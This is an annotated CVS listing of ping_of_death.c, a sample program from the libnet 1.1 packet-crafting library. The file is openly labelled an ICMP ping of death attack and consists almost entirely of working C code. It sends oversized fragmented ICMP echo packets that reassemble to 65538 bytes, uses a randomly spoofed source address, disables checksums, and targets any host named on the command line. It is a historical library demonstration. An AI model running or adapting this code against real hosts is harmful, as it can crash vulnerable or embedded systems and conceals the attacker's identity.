Annotation of embedaddon/libnet/sample/ping_of_death.c, revision 1.1.1.1
1.1 misho 1: /*
2: * $Id: ping_of_death.c,v 1.2 2004/01/03 20:31:01 mike Exp $
3: *
4: * libnet 1.1
5: * ICMP ping of death attack
6: *
7: * Copyright (c) 1998 - 2004 Mike D. Schiffman <mike@infonexus.com>
8: * All rights reserved.
9: *
10: * Copyright (c) 1999 - 2001 Dug Song <dugsong@monkey.org>
11: * All rights reserved.
12: *
13: * Redistribution and use in source and binary forms, with or without
14: * modification, are permitted provided that the following conditions
15: * are met:
16: * 1. Redistributions of source code must retain the above copyright
17: * notice, this list of conditions and the following disclaimer.
18: * 2. Redistributions in binary form must reproduce the above copyright
19: * notice, this list of conditions and the following disclaimer in the
20: * documentation and/or other materials provided with the distribution.
21: *
22: * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
23: * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
24: * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
25: * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
26: * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
27: * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
28: * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
29: * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
30: * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
31: * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
32: * SUCH DAMAGE.
33: *
34: */
35:
36: #if (HAVE_CONFIG_H)
37: #include "../include/config.h"
38: #endif
39: #include "./libnet_test.h"
40:
41:
42: #define FRAG_LEN 1472
43:
44: int
45: main(int argc, char **argv)
46: {
47: libnet_t *l;
48: libnet_ptag_t ip;
49: libnet_ptag_t icmp;
50: struct libnet_stats ls;
51: u_long fakesrc, target;
52: u_char *data;
53: int c, i, flags, offset, len;
54: char errbuf[LIBNET_ERRBUF_SIZE];
55:
56: printf("libnet 1.1 Ping of Death[raw]\n");
57:
58: /*
59: * Initialize the library. Root priviledges are required.
60: */
61: l = libnet_init(
62: LIBNET_RAW4, /* injection type */
63: NULL, /* network interface */
64: errbuf); /* errbuf */
65:
66: if (l == NULL)
67: {
68: fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
69: exit(EXIT_FAILURE);
70: }
71:
72: if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1)))
73: {
74: fprintf(stderr, "Usage: %s <target>\n", argv[0]);
75: exit(EXIT_FAILURE);
76: }
77:
78: /* get random src addr. */
79: libnet_seed_prand(l);
80: fakesrc = libnet_get_prand(LIBNET_PRu32);
81:
82: data = malloc(FRAG_LEN);
83: for (i = 0 ; i < FRAG_LEN ; i++)
84: {
85: /* fill it with something */
86: data[i] = 0x3a;
87: }
88:
89: ip = LIBNET_PTAG_INITIALIZER;
90: icmp = LIBNET_PTAG_INITIALIZER;
91:
92: for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN))
93: {
94: offset = i;
95: flags = 0;
96:
97: if (offset < 65120)
98: {
99: flags = IP_MF;
100: len = FRAG_LEN;
101: }
102: else
103: {
104: /* for a total reconstructed length of 65538 bytes */
105: len = 410;
106: }
107:
108: icmp = libnet_build_icmpv4_echo(
109: ICMP_ECHO, /* type */
110: 0, /* code */
111: 0, /* checksum */
112: 666, /* id */
113: 666, /* sequence */
114: data, /* payload */
115: len, /* payload size */
116: l, /* libnet handle */
117: icmp); /* libnet ptag */
118: if (icmp == -1)
119: {
120: fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
121: goto bad;
122: }
123: /* no reason to do this */
124: libnet_toggle_checksum(l, icmp, 0);
125:
126: ip = libnet_build_ipv4(
127: LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */
128: 0, /* TOS */
129: 666, /* IP ID */
130: flags | (offset >> 3), /* IP Frag */
131: 64, /* TTL */
132: IPPROTO_ICMP, /* protocol */
133: 0, /* checksum */
134: fakesrc, /* source IP */
135: target, /* destination IP */
136: NULL, /* payload */
137: 0, /* payload size */
138: l, /* libnet handle */
139: ip); /* libnet ptag */
140: if (ip == -1)
141: {
142: fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
143: goto bad;
144: }
145:
146: c = libnet_write(l);
147: if (c == -1)
148: {
149: fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
150: }
151:
152: /* tcpdump-style jonks. */
153: printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0),
154: argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : "");
155: }
156:
157: libnet_stats(l, &ls);
158: fprintf(stderr, "Packets sent: %lld\n"
159: "Packet errors: %lld\n"
160: "Bytes written: %lld\n",
161: ls.packets_sent, ls.packet_errors, ls.bytes_written);
162: libnet_destroy(l);
163: free(data);
164: return (EXIT_SUCCESS);
165: bad:
166: libnet_destroy(l);
167: free(data);
168: return (EXIT_FAILURE);
169: }
170:
171: /* EOF */
FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>